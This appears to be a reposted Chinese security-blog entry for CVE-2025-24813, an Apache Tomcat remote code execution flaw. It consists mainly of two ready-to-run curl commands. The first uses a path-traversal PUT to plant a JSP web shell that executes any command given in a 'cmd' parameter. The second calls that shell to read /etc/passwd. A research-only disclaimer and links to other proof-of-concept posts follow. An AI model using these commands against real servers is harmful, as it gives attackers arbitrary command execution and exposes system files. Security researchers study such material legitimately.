CVE-2025-24813 - Apache Tomcat RCE

2025年4月7日00:43:10评论18 views字数 602阅读2分0秒阅读模式

curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp"   -H "Content-Type: application/x-jsp"   --data-raw '<%@ page import="java.io.*" %><html><body><formmethod="GET"><inputtype="text"name="cmd"><inputtype="submit"value="Run"></form><% if(request.getParameter("cmd") != null) {Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %></body></html>' -i

curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i

原文始发于微信公众号（TtTeam）：CVE-2025-24813 - Apache Tomcat RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2025-24813 - Apache Tomcat RCE

宏景人力资源管理系统 searchCreatPlanList.do SQL注入漏洞(CNVD-2025-6953) POC

WordPress未授权任意文件读取_CVE-2025-2294 POC

Fortinet FortiSwitch 任意密码重置 CVE-2024-48887

DataEase H2 JDBC远程代码执行漏洞CVE-2025-32966

金盘移动图书馆系统信息泄露漏洞

Netgear信息泄露漏洞

JeeWMS cgAutoListController.do SQL注入漏洞

泛微E-Cology9前台SQL注入漏洞

OpenSourceMatters Joomla 未授权SQL注入漏洞

某代理商管理系统存在RCE漏洞

发表评论

在线咨询

微信